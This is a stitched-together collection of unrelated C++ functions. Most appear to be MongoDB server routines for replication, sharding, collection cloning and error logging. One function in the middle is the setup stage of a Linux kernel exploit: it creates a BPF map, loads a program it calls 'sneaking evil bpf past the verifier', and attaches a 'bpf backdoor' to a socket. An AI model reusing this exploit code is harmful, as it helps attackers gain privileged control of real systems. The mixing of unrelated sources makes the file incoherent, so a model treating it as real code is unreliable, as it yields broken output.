OpTimeWithHash BackgroundSync::_readLastAppliedOpTimeWithHash(OperationContext* opCtx) { BSONObj oplogEntry; try { bool success = writeConflictRetry( opCtx, "readLastAppliedHash", NamespaceString::kRsOplogNamespace.ns(), [&] { Lock::DBLock lk(opCtx, "local", MODE_X); return Helpers::getLast( opCtx, NamespaceString::kRsOplogNamespace.ns().c_str(), oplogEntry); }); if (!success) { // This can happen when we are to do an initial sync. lastHash will be set // after the initial sync is complete. return OpTimeWithHash(0); } } catch (const DBException& ex) { severe() << "Problem reading " << NamespaceString::kRsOplogNamespace.ns() << ": " << redact(ex); fassertFailed(18904); } long long hash; auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash); if (!status.isOK()) { severe() << "Most recent entry in " << NamespaceString::kRsOplogNamespace.ns() << " is missing or has invalid \"" << kHashFieldName << "\" field. Oplog entry: " << redact(oplogEntry) << ": " << redact(status); fassertFailed(18902); } OplogEntry parsedEntry(oplogEntry); return OpTimeWithHash(hash, parsedEntry.getOpTime()); }
void ClusterAggregate::killAllCursors(const std::vector<Strategy::CommandResult>& shardResults) { // This function must ignore and log all errors. Callers expect a best-effort attempt at // cleanup without exceptions. If any cursors aren't cleaned up here, they will be cleaned // up automatically on the shard after 10 minutes anyway. for (size_t i = 0; i < shardResults.size(); i++) { try { BSONObj result = shardResults[i].result; if (!result["ok"].trueValue()) { continue; } const long long cursor = result["cursor"]["id"].Long(); if (!cursor) { continue; } ScopedDbConnection conn(shardResults[i].target); conn->killCursor(cursor); conn.done(); } catch (const DBException& e) { log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target << " due to DBException: " << redact(e); } catch (const std::exception& e) { log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target << " due to std::exception: " << redact(e.what()); } catch (...) { log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target << " due to non-exception"; } } }
/** * Remaps the private view from the shared view so that it does not consume too much * copy-on-write/swap space. Must only be called after the in-memory journal has been flushed * to disk and applied on top of the shared view. * * @param fraction Value between (0, 1] indicating what fraction of the memory to remap. * Remapping too much or too frequently incurs copy-on-write page fault cost. */ static void remapPrivateView(OperationContext* opCtx, double fraction) { // Remapping private views must occur after WRITETODATAFILES otherwise we wouldn't see any // newly written data on reads. invariant(!commitJob.hasWritten()); try { Timer t; remapPrivateViewImpl(opCtx, fraction); stats.curr()->_remapPrivateViewMicros += t.micros(); LOG(4) << "remapPrivateView end"; return; } catch (DBException& e) { severe() << "dbexception in remapPrivateView causing immediate shutdown: " << redact(e); } catch (std::ios_base::failure& e) { severe() << "ios_base exception in remapPrivateView causing immediate shutdown: " << redact(e.what()); } catch (std::bad_alloc& e) { severe() << "bad_alloc exception in remapPrivateView causing immediate shutdown: " << redact(e.what()); } catch (std::exception& e) { severe() << "exception in remapPrivateView causing immediate shutdown: " << redact(e.what()); } catch (...) { severe() << "unknown exception in remapPrivateView causing immediate shutdown: "; } invariant(false); }
/** * Invoked at server startup. Recovers the database by replaying journal files and then * starts the durability thread. */ void startup(ClockSource* cs, int64_t serverStartMs) { if (!storageGlobalParams.dur) { return; } journalMakeDir(cs, serverStartMs); try { replayJournalFilesAtStartup(); } catch (DBException& e) { severe() << "dbexception during recovery: " << redact(e); throw; } catch (std::exception& e) { severe() << "std::exception during recovery: " << redact(e.what()); throw; } catch (...) { severe() << "exception during recovery"; throw; } preallocateFiles(); durableImpl.start(cs, serverStartMs); DurableInterface::_impl = &durableImpl; }
void ShardingEgressMetadataHookForMongos::_saveGLEStats(const BSONObj& metadata, StringData hostString) { if (!haveClient()) { // Client will be present only when write commands are used. return; } auto swShardingMetadata = rpc::ShardingMetadata::readFromMetadata(metadata); if (swShardingMetadata.getStatus() == ErrorCodes::NoSuchKey) { return; } else if (!swShardingMetadata.isOK()) { warning() << "Got invalid sharding metadata " << redact(swShardingMetadata.getStatus()) << " metadata object was '" << redact(metadata) << "'"; return; } auto shardConn = ConnectionString::parse(hostString.toString()); // If we got the reply from this host, we expect that its 'hostString' must be valid. if (!shardConn.isOK()) { severe() << "got bad host string in saveGLEStats: " << hostString; } invariantOK(shardConn.getStatus()); auto shardingMetadata = std::move(swShardingMetadata.getValue()); auto& clientInfo = cc(); LOG(4) << "saveGLEStats lastOpTime:" << shardingMetadata.getLastOpTime() << " electionId:" << shardingMetadata.getLastElectionId(); ClusterLastErrorInfo::get(clientInfo) ->addHostOpTime( shardConn.getValue(), HostOpTime(shardingMetadata.getLastOpTime(), shardingMetadata.getLastElectionId())); }
void CollectionCloner::_finishCallback(const Status& status) { LOG(1) << "CollectionCloner ns:" << _destNss << " finished with status: " << redact(status); // Copy the status so we can change it below if needed. auto finalStatus = status; bool callCollectionLoader = false; UniqueLock lk(_mutex); callCollectionLoader = _collLoader.operator bool(); lk.unlock(); if (callCollectionLoader) { if (finalStatus.isOK()) { const auto loaderStatus = _collLoader->commit(); if (!loaderStatus.isOK()) { warning() << "Failed to commit changes to collection " << _destNss.ns() << ": " << redact(loaderStatus); finalStatus = loaderStatus; } } // This will release the resources held by the loader. _collLoader.reset(); } _onCompletion(finalStatus); lk.lock(); _stats.end = _executor->now(); _progressMeter.finished(); _active = false; _condition.notify_all(); LOG(1) << " collection: " << _destNss << ", stats: " << _stats.toString(); }
long long BackgroundSync::_readLastAppliedHash(OperationContext* txn) { BSONObj oplogEntry; try { MONGO_WRITE_CONFLICT_RETRY_LOOP_BEGIN { ScopedTransaction transaction(txn, MODE_IX); Lock::DBLock lk(txn->lockState(), "local", MODE_X); bool success = Helpers::getLast(txn, rsOplogName.c_str(), oplogEntry); if (!success) { // This can happen when we are to do an initial sync. lastHash will be set // after the initial sync is complete. return 0; } } MONGO_WRITE_CONFLICT_RETRY_LOOP_END(txn, "readLastAppliedHash", rsOplogName); } catch (const DBException& ex) { severe() << "Problem reading " << rsOplogName << ": " << redact(ex); fassertFailed(18904); } long long hash; auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash); if (!status.isOK()) { severe() << "Most recent entry in " << rsOplogName << " is missing or has invalid \"" << kHashFieldName << "\" field. Oplog entry: " << redact(oplogEntry) << ": " << redact(status); fassertFailed(18902); } return hash; }
void onDbVersionMismatch(OperationContext* opCtx, const StringData dbName, const DatabaseVersion& clientDbVersion, const boost::optional<DatabaseVersion>& serverDbVersion) noexcept { invariant(!opCtx->lockState()->isLocked()); invariant(!opCtx->getClient()->isInDirectClient()); auto const shardingState = ShardingState::get(opCtx); invariant(shardingState->canAcceptShardedCommands()); if (serverDbVersion && serverDbVersion->getUuid() == clientDbVersion.getUuid() && serverDbVersion->getLastMod() >= clientDbVersion.getLastMod()) { // The client was stale; do not trigger server-side refresh. return; } try { // TODO SERVER-33773 if the 'waitForMovePrimaryCriticalSection' flag is set on the // OperationShardingState, wait for the movePrimary critical section to complete before // attempting a refresh. } catch (const DBException& ex) { log() << "Failed to wait for movePrimary critical section to complete " << causedBy(redact(ex)); return; } try { forceDatabaseRefresh(opCtx, dbName); } catch (const DBException& ex) { log() << "Failed to refresh databaseVersion for database " << dbName << causedBy(redact(ex)); } }
void initialize() { info("\n"); info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n"); info("\n"); info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n"); info("\n"); redact("creating bpf map\n"); mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0); if (mapfd < 0) { fail("failed to create bpf map: '%s'\n", strerror(errno)); } redact("sneaking evil bpf past the verifier\n"); progfd = load_prog(); if (progfd < 0) { if (errno == EACCES) { msg("log:\n%s", bpf_log_buf); } fail("failed to load prog '%s'\n", strerror(errno)); } redact("creating socketpair()\n"); if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) { fail("failed to create socket pair '%s'\n", strerror(errno)); } redact("attaching bpf backdoor to socket\n"); if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) { fail("setsockopt '%s'\n", strerror(errno)); } }
Status ShardingStateRecovery::recover(OperationContext* opCtx) { if (serverGlobalParams.clusterRole != ClusterRole::ShardServer) { return Status::OK(); } BSONObj recoveryDocBSON; try { AutoGetCollection autoColl(opCtx, NamespaceString::kConfigCollectionNamespace, MODE_IS); if (!Helpers::findOne( opCtx, autoColl.getCollection(), RecoveryDocument::getQuery(), recoveryDocBSON)) { return Status::OK(); } } catch (const DBException& ex) { return ex.toStatus(); } const auto recoveryDocStatus = RecoveryDocument::fromBSON(recoveryDocBSON); if (!recoveryDocStatus.isOK()) return recoveryDocStatus.getStatus(); const auto recoveryDoc = std::move(recoveryDocStatus.getValue()); log() << "Sharding state recovery process found document " << redact(recoveryDoc.toBSON()); ShardingState* const shardingState = ShardingState::get(opCtx); invariant(shardingState->enabled()); if (!recoveryDoc.getMinOpTimeUpdaters()) { // Treat the minOpTime as up-to-date grid.advanceConfigOpTime(recoveryDoc.getMinOpTime()); return Status::OK(); } log() << "Sharding state recovery document indicates there were " << recoveryDoc.getMinOpTimeUpdaters() << " metadata change operations in flight. Contacting the config server primary in order " "to retrieve the most recent opTime."; // Need to fetch the latest uptime from the config server, so do a logging write Status status = grid.catalogClient(opCtx)->logChange(opCtx, "Sharding minOpTime recovery", NamespaceString::kConfigCollectionNamespace.ns(), recoveryDocBSON, ShardingCatalogClient::kMajorityWriteConcern); if (!status.isOK()) return status; log() << "Sharding state recovered. New config server opTime is " << grid.configOpTime(); // Finally, clear the recovery document so next time we don't need to recover status = modifyRecoveryDocument(opCtx, RecoveryDocument::Clear, kLocalWriteConcern); if (!status.isOK()) { warning() << "Failed to reset sharding state recovery document due to " << redact(status); } return Status::OK(); }
void AbstractIndexAccessMethod::getKeys(const BSONObj& obj, GetKeysMode mode, BSONObjSet* keys, BSONObjSet* multikeyMetadataKeys, MultikeyPaths* multikeyPaths) const { // TODO SERVER-36385: Remove ErrorCodes::KeyTooLong. static stdx::unordered_set<int> whiteList{ErrorCodes::CannotBuildIndexKeys, // Btree ErrorCodes::KeyTooLong, ErrorCodes::CannotIndexParallelArrays, // FTS 16732, 16733, 16675, 17261, 17262, // Hash 16766, // Haystack 16775, 16776, // 2dsphere geo 16755, 16756, // 2d geo 16804, 13067, 13068, 13026, 13027}; try { doGetKeys(obj, keys, multikeyMetadataKeys, multikeyPaths); } catch (const AssertionException& ex) { // Suppress all indexing errors when mode is kRelaxConstraints. if (mode == GetKeysMode::kEnforceConstraints) { throw; } keys->clear(); if (multikeyPaths) { multikeyPaths->clear(); } // Only suppress the errors in the whitelist. if (whiteList.find(ex.code()) == whiteList.end()) { throw; } // If the document applies to the filter (which means that it should have never been // indexed), do not supress the error. const MatchExpression* filter = _btreeState->getFilterExpression(); if (mode == GetKeysMode::kRelaxConstraintsUnfiltered && filter && filter->matchesBSON(obj)) { throw; } LOG(1) << "Ignoring indexing error for idempotency reasons: " << redact(ex) << " when getting index keys of " << redact(obj); } }
static void logCursorsWaiting(RangeDeleteEntry* entry) { // We always log the first cursors waiting message (so we have cursor ids in the logs). // After 15 minutes (the cursor timeout period), we start logging additional messages at // a 1 minute interval. static const auto kLogCursorsThreshold = Minutes{15}; static const auto kLogCursorsInterval = Minutes{1}; Date_t currentTime = jsTime(); Milliseconds elapsedMillisSinceQueued{0}; // We always log the first message when lastLoggedTime == 0 if (entry->lastLoggedTS != Date_t()) { if (currentTime > entry->stats.queueStartTS) elapsedMillisSinceQueued = currentTime - entry->stats.queueStartTS; // Not logging, threshold not passed if (elapsedMillisSinceQueued < kLogCursorsThreshold) return; Milliseconds elapsedMillisSinceLog{0}; if (currentTime > entry->lastLoggedTS) elapsedMillisSinceLog = currentTime - entry->lastLoggedTS; // Not logging, logged a short time ago if (elapsedMillisSinceLog < kLogCursorsInterval) return; } str::stream cursorList; for (std::set<CursorId>::const_iterator it = entry->cursorsToWait.begin(); it != entry->cursorsToWait.end(); ++it) { if (it != entry->cursorsToWait.begin()) cursorList << ", "; cursorList << *it; } log() << "waiting for open cursors before removing range " << "[" << redact(entry->options.range.minKey) << ", " << redact(entry->options.range.maxKey) << ") " << "in " << entry->options.range.ns << (entry->lastLoggedTS == Date_t() ? string("") : string(str::stream() << ", elapsed secs: " << durationCount<Seconds>(elapsedMillisSinceQueued))) << ", cursor ids: [" << string(cursorList) << "]"; entry->lastLoggedTS = currentTime; }
MoveTimingHelper::~MoveTimingHelper() { // even if logChange doesn't throw, bson does // sigh try { if (_to.isValid()) { _b.append("to", _to.toString()); } if (_from.isValid()) { _b.append("from", _from.toString()); } if (_nextStep != _totalNumSteps) { _b.append("note", "aborted"); } else { _b.append("note", "success"); } if (!_cmdErrmsg->empty()) { _b.append("errmsg", *_cmdErrmsg); } grid.catalogClient(_txn)->logChange(_txn, str::stream() << "moveChunk." << _where, _ns, _b.obj(), ShardingCatalogClient::kMajorityWriteConcern); } catch (const std::exception& e) { warning() << "couldn't record timing for moveChunk '" << _where << "': " << redact(e.what()); } }
StatusWith<DistLockManager::ScopedDistLock> MigrationManager::_getDistLock( OperationContext* txn, const Migration& migration) { const std::string whyMessage(str::stream() << "migrating chunk " << ChunkRange(migration.chunkInfo.migrateInfo.minKey, migration.chunkInfo.migrateInfo.maxKey) .toString() << " in " << migration.chunkInfo.migrateInfo.ns); StatusWith<DistLockManager::ScopedDistLock> distLockStatus = Grid::get(txn)->catalogClient(txn)->distLock( txn, migration.chunkInfo.migrateInfo.ns, whyMessage); if (!distLockStatus.isOK()) { const std::string msg = str::stream() << "Could not acquire collection lock for " << migration.chunkInfo.migrateInfo.ns << " to migrate chunk " << redact(ChunkRange(migration.chunkInfo.migrateInfo.minKey, migration.chunkInfo.migrateInfo.maxKey) .toString()) << " due to " << distLockStatus.getStatus().toString(); warning() << msg; return {distLockStatus.getStatus().code(), msg}; } return std::move(distLockStatus.getValue()); }
void BackgroundJob::jobBody() { const string threadName = name(); if (!threadName.empty()) { setThreadName(threadName); } LOG(1) << "BackgroundJob starting: " << threadName; try { run(); } catch (const std::exception& e) { error() << "backgroundjob " << threadName << " exception: " << redact(e.what()); throw; } // We must cache this value so that we can use it after we leave the following scope. const bool selfDelete = _selfDelete; { // It is illegal to access any state owned by this BackgroundJob after leaving this // scope, with the exception of the call to 'delete this' below. stdx::unique_lock<stdx::mutex> l(_status->mutex); _status->state = Done; _status->done.notify_all(); } if (selfDelete) delete this; }
void Database::clearTmpCollections(OperationContext* txn) { invariant(txn->lockState()->isDbLockedForMode(name(), MODE_X)); list<string> collections; _dbEntry->getCollectionNamespaces(&collections); for (list<string>::iterator i = collections.begin(); i != collections.end(); ++i) { string ns = *i; invariant(NamespaceString::normal(ns)); CollectionCatalogEntry* coll = _dbEntry->getCollectionCatalogEntry(ns); CollectionOptions options = coll->getCollectionOptions(txn); if (!options.temp) continue; try { WriteUnitOfWork wunit(txn); Status status = dropCollection(txn, ns); if (!status.isOK()) { warning() << "could not drop temp collection '" << ns << "': " << redact(status); continue; } wunit.commit(); } catch (const WriteConflictException& exp) { warning() << "could not drop temp collection '" << ns << "' due to " "WriteConflictException"; txn->recoveryUnit()->abandonSnapshot(); } } }
std::string MoveChunkRequest::toString() const { std::stringstream ss; ss << "ns: " << getNss().ns() << ", " << redact(ChunkRange(getMinKey(), getMaxKey()).toString()) << ", fromShard: " << getFromShardId() << ", toShard: " << getToShardId(); return ss.str(); }
void WiredTigerRecoveryUnit::_abort() { try { bool notifyDone = !_prepareTimestamp.isNull(); if (_session && _isActive()) { _txnClose(false); } _setState(State::kAborting); if (MONGO_FAIL_POINT(WTAlwaysNotifyPrepareConflictWaiters)) { notifyDone = true; } if (notifyDone) { _sessionCache->notifyPreparedUnitOfWorkHasCommittedOrAborted(); } for (Changes::const_reverse_iterator it = _changes.rbegin(), end = _changes.rend(); it != end; ++it) { Change* change = it->get(); LOG(2) << "CUSTOM ROLLBACK " << redact(demangleName(typeid(*change))); change->rollback(); } _changes.clear(); } catch (...) { std::terminate(); } _setState(State::kInactive); }
Database::Database(OperationContext* txn, StringData name, DatabaseCatalogEntry* dbEntry) : _name(name.toString()), _dbEntry(dbEntry), _profileName(_name + ".system.profile"), _indexesName(_name + ".system.indexes"), _viewsName(_name + "." + DurableViewCatalog::viewsCollectionName().toString()), _durableViews(DurableViewCatalogImpl(this)), _views(&_durableViews) { Status status = validateDBName(_name); if (!status.isOK()) { warning() << "tried to open invalid db: " << _name; uasserted(10028, status.toString()); } _profile = serverGlobalParams.defaultProfile; list<string> collections; _dbEntry->getCollectionNamespaces(&collections); for (list<string>::const_iterator it = collections.begin(); it != collections.end(); ++it) { const string ns = *it; _collections[ns] = _getOrCreateCollectionInstance(txn, ns); } // At construction time of the viewCatalog, the _collections map wasn't initialized yet, so no // system.views collection would be found. Now we're sufficiently initialized, signal a version // change. Also force a reload, so if there are problems with the catalog contents as might be // caused by incorrect mongod versions or similar, they are found right away. _views.invalidate(); Status reloadStatus = _views.reloadIfNeeded(txn); if (!reloadStatus.isOK()) { warning() << "Unable to parse views: " << redact(reloadStatus) << "; remove any invalid views from the " << _viewsName << " collection to restore server functionality." << startupWarningsLog; } }
void NetworkInterfaceASIO::_beginCommunication(AsyncOp* op) { // The way that we connect connections for the connection pool is by // starting the callback chain with connect(), but getting off at the first // _beginCommunication. I.e. all AsyncOp's start off with _inSetup == true // and arrive here as they're connected and authed. Once they hit here, we // return to the connection pool's get() callback with _inSetup == false, // so we can proceed with user operations after they return to this // codepath. if (op->_inSetup) { log() << "Successfully connected to " << op->request().target.toString(); op->_inSetup = false; op->finish(RemoteCommandResponse()); return; } LOG(3) << "Initiating asynchronous command: " << redact(op->request().toString()); auto beginStatus = op->beginCommand(op->request()); if (!beginStatus.isOK()) { return _completeOperation(op, beginStatus); } _asyncRunCommand(op, [this, op](std::error_code ec, size_t bytes) { _validateAndRun(op, ec, [this, op]() { _completedOpCallback(op); }); }); }
void ShardingStateRecovery::endMetadataOp(OperationContext* opCtx) { Status status = modifyRecoveryDocument(opCtx, RecoveryDocument::Decrement, WriteConcernOptions()); if (!status.isOK()) { warning() << "Failed to decrement minOpTimeUpdaters due to " << redact(status); } }
void ShardingInitializationMongoD::updateShardIdentityConfigString( OperationContext* opCtx, const ConnectionString& newConnectionString) { BSONObj updateObj( ShardIdentityType::createConfigServerUpdateObject(newConnectionString.toString())); UpdateRequest updateReq(NamespaceString::kServerConfigurationNamespace); updateReq.setQuery(BSON("_id" << ShardIdentityType::IdName)); updateReq.setUpdateModification(updateObj); try { AutoGetOrCreateDb autoDb( opCtx, NamespaceString::kServerConfigurationNamespace.db(), MODE_X); auto result = update(opCtx, autoDb.getDb(), updateReq); if (result.numMatched == 0) { warning() << "failed to update config string of shard identity document because " << "it does not exist. This shard could have been removed from the cluster"; } else { LOG(2) << "Updated config server connection string in shardIdentity document to" << newConnectionString; } } catch (const DBException& exception) { auto status = exception.toStatus(); if (!ErrorCodes::isNotMasterError(status.code())) { warning() << "Error encountered while trying to update config connection string to " << newConnectionString.toString() << causedBy(redact(status)); } } }
Message OpMsgBuilder::finish() { if (kDebugBuild && !disableDupeFieldCheck_forTest.load()) { std::set<StringData> seenFields; for (auto elem : resumeBody().asTempObj()) { if (!(seenFields.insert(elem.fieldNameStringData()).second)) { severe() << "OP_MSG with duplicate field '" << elem.fieldNameStringData() << "' : " << redact(resumeBody().asTempObj()); fassert(40474, false); } } } invariant(_state == kBody); invariant(_bodyStart); invariant(!_openBuilder); _state = kDone; const auto size = _buf.len(); MSGHEADER::View header(_buf.buf()); header.setMessageLength(size); // header.setRequestMsgId(...); // These are currently filled in by the networking layer. // header.setResponseToMsgId(...); header.setOpCode(dbMsg); return Message(_buf.release()); }
void RSDataSync::_run() { Client::initThread("rsSync"); AuthorizationSession::get(cc())->grantInternalAuthorization(); // Overwrite prefetch index mode in BackgroundSync if ReplSettings has a mode set. auto&& replSettings = _replCoord->getSettings(); if (replSettings.isPrefetchIndexModeSet()) _replCoord->setIndexPrefetchConfig(replSettings.getPrefetchIndexMode()); while (!_bgsync->inShutdown()) { // After a reconfig, we may not be in the replica set anymore, so // check that we are in the set (and not an arbiter) before // trying to sync with other replicas. // TODO(spencer): Use a condition variable to await loading a config if (_replCoord->getMemberState().startup()) { warning() << "did not receive a valid config yet"; sleepsecs(1); continue; } const MemberState memberState = _replCoord->getMemberState(); // TODO(siyuan) Control the behavior using applier state. // An arbiter can never transition to any other state, and doesn't replicate, ever if (memberState.arbiter()) { break; } // If we are removed then we don't belong to the set anymore if (memberState.removed()) { sleepsecs(5); continue; } try { if (_replCoord->getApplierState() == ReplicationCoordinator::ApplierState::Stopped) { sleepsecs(1); continue; } auto status = _replCoord->setFollowerMode(MemberState::RS_RECOVERING); if (!status.isOK()) { LOG(2) << "Failed to transition to RECOVERING to start data replication" << causedBy(status); continue; } // Once we call into SyncTail::oplogApplication we never return, so this code only runs // at startup. It is not valid to transition from PRIMARY to RECOVERING ever, or from // SECONDARY to RECOVERING without holding a global X lock, so we invariant to make // sure this never happens. invariant(!memberState.primary() && !memberState.secondary()); SyncTail(_bgsync, multiSyncApply).oplogApplication(_replCoord); } catch (...) { auto status = exceptionToStatus(); severe() << "Exception thrown in RSDataSync: " << redact(status); std::terminate(); } } }
void CollectionCloner::_finishCallback(const Status& status) { log() << "CollectionCloner ns:" << _destNss << " finished cloning with status: " << redact(status); // Copy the status so we can change it below if needed. auto finalStatus = status; bool callCollectionLoader = false; decltype(_onCompletion) onCompletion; { LockGuard lk(_mutex); invariant(_state != State::kComplete); callCollectionLoader = _collLoader.operator bool(); invariant(_onCompletion); std::swap(_onCompletion, onCompletion); } if (callCollectionLoader) { if (finalStatus.isOK()) { const auto loaderStatus = _collLoader->commit(); if (!loaderStatus.isOK()) { warning() << "Failed to commit collection indexes " << _destNss.ns() << ": " << redact(loaderStatus); finalStatus = loaderStatus; } } // This will release the resources held by the loader. _collLoader.reset(); } onCompletion(finalStatus); // This will release the resources held by the callback function object. '_onCompletion' is // already cleared at this point and 'onCompletion' is the remaining reference to the callback // function (with any implicitly held resources). To avoid any issues with destruction logic // in the function object's resources accessing this CollectionCloner, we release this function // object outside the lock. onCompletion = {}; LockGuard lk(_mutex); _stats.end = _executor->now(); _progressMeter.finished(); _state = State::kComplete; _condition.notify_all(); LOG(1) << " collection: " << _destNss << ", stats: " << _stats.toString(); }
StatusWith<OplogApplier::Operations> OplogApplier::getNextApplierBatch( OperationContext* opCtx, const BatchLimits& batchLimits) { if (batchLimits.ops == 0) { return Status(ErrorCodes::InvalidOptions, "Batch size must be greater than 0."); } std::uint32_t totalBytes = 0; Operations ops; BSONObj op; while (_oplogBuffer->peek(opCtx, &op)) { auto entry = OplogEntry(op); // Check for oplog version change. If it is absent, its value is one. if (entry.getVersion() != OplogEntry::kOplogVersion) { std::string message = str::stream() << "expected oplog version " << OplogEntry::kOplogVersion << " but found version " << entry.getVersion() << " in oplog entry: " << redact(entry.toBSON()); severe() << message; return {ErrorCodes::BadValue, message}; } // Commands must be processed one at a time. The only exception to this is applyOps because // applyOps oplog entries are effectively containers for CRUD operations. Therefore, it is // safe to batch applyOps commands with CRUD operations when reading from the oplog buffer. if (entry.isCommand() && (entry.getCommandType() != OplogEntry::CommandType::kApplyOps || entry.shouldPrepare())) { if (ops.empty()) { // Apply commands one-at-a-time. ops.push_back(std::move(entry)); BSONObj opToPopAndDiscard; invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard)); dassert(ops.back() == OplogEntry(opToPopAndDiscard)); } // Otherwise, apply what we have so far and come back for the command. return std::move(ops); } // Apply replication batch limits. if (ops.size() >= batchLimits.ops) { return std::move(ops); } // Never return an empty batch if there are operations left. if ((totalBytes + entry.getRawObjSizeBytes() >= batchLimits.bytes) && (ops.size() > 0)) { return std::move(ops); } // Add op to buffer. totalBytes += entry.getRawObjSizeBytes(); ops.push_back(std::move(entry)); BSONObj opToPopAndDiscard; invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard)); dassert(ops.back() == OplogEntry(opToPopAndDiscard)); } return std::move(ops); }
NOINLINE_DECL void uassertedWithLocation(int msgid, const char* msg, const char* file, unsigned line) { assertionCount.condrollover(++assertionCount.user); LOG(1) << "User Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line << endl; throw UserException(msgid, msg); }
NOINLINE_DECL void msgassertedNoTraceWithLocation(int msgid, const char* msg, const char* file, unsigned line) { assertionCount.condrollover(++assertionCount.warning); log() << "Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line << endl; throw MsgAssertionException(msgid, msg); }
void BackgroundSync::_rollback(OperationContext* txn, const HostAndPort& source, stdx::function<DBClientBase*()> getConnection) { // Abort only when syncRollback detects we are in a unrecoverable state. // In other cases, we log the message contained in the error status and retry later. auto status = syncRollback(txn, OplogInterfaceLocal(txn, rsOplogName), RollbackSourceImpl(getConnection, source, rsOplogName), _replCoord); if (status.isOK()) { // When the syncTail thread sees there is no new data by adding something to the buffer. _signalNoNewDataForApplier(txn); // Wait until the buffer is empty. // This is an indication that syncTail has removed the sentinal marker from the buffer // and reset its local lastAppliedOpTime via the replCoord. while (!_oplogBuffer->isEmpty()) { sleepmillis(10); if (inShutdown()) { return; } } // At this point we are about to leave rollback. Before we do, wait for any writes done // as part of rollback to be durable, and then do any necessary checks that we didn't // wind up rolling back something illegal. We must wait for the rollback to be durable // so that if we wind up shutting down uncleanly in response to something we rolled back // we know that we won't wind up right back in the same situation when we start back up // because the rollback wasn't durable. txn->recoveryUnit()->waitUntilDurable(); // If we detected that we rolled back the shardIdentity document as part of this rollback // then we must shut down to clear the in-memory ShardingState associated with the // shardIdentity document. if (ShardIdentityRollbackNotifier::get(txn)->didRollbackHappen()) { severe() << "shardIdentity document rollback detected. Shutting down to clear " "in-memory sharding state. Restarting this process should safely return it " "to a healthy state"; fassertFailedNoTrace(40276); } // It is now safe to clear the ROLLBACK state, which may result in the applier thread // transitioning to SECONDARY. This is safe because the applier thread has now reloaded // the new rollback minValid from the database. if (!_replCoord->setFollowerMode(MemberState::RS_RECOVERING)) { warning() << "Failed to transition into " << MemberState(MemberState::RS_RECOVERING) << "; expected to be in state " << MemberState(MemberState::RS_ROLLBACK) << " but found self in " << _replCoord->getMemberState(); } return; } if (ErrorCodes::UnrecoverableRollbackError == status.code()) { fassertNoTrace(28723, status); } warning() << "rollback cannot proceed at this time (retrying later): " << redact(status); }
void AsyncRequestsSender::_scheduleRequests() { invariant(!_stopRetrying); // Schedule remote work on hosts for which we have not sent a request or need to retry. for (size_t i = 0; i < _remotes.size(); ++i) { auto& remote = _remotes[i]; // First check if the remote had a retriable error, and if so, clear its response field so // it will be retried. if (remote.swResponse && !remote.done) { // We check both the response status and command status for a retriable error. Status status = remote.swResponse->getStatus(); if (status.isOK()) { status = getStatusFromCommandResult(remote.swResponse->getValue().data); } if (status.isOK()) { status = getWriteConcernStatusFromCommandResult(remote.swResponse->getValue().data); } if (!status.isOK()) { // There was an error with either the response or the command. auto shard = remote.getShard(); if (!shard) { remote.swResponse = Status(ErrorCodes::ShardNotFound, str::stream() << "Could not find shard " << remote.shardId); } else { if (remote.shardHostAndPort) { shard->updateReplSetMonitor(*remote.shardHostAndPort, status); } if (shard->isRetriableError(status.code(), _retryPolicy) && remote.retryCount < kMaxNumFailedHostRetryAttempts) { LOG(1) << "Command to remote " << remote.shardId << " at host " << *remote.shardHostAndPort << " failed with retriable error and will be retried " << causedBy(redact(status)); ++remote.retryCount; remote.swResponse.reset(); } } } } // If the remote does not have a response or pending request, schedule remote work for it. if (!remote.swResponse && !remote.cbHandle.isValid()) { auto scheduleStatus = _scheduleRequest(i); if (!scheduleStatus.isOK()) { remote.swResponse = std::move(scheduleStatus); // Push a noop response to the queue to indicate that a remote is ready for // re-processing due to failure. _responseQueue.producer.push(boost::none); } } } }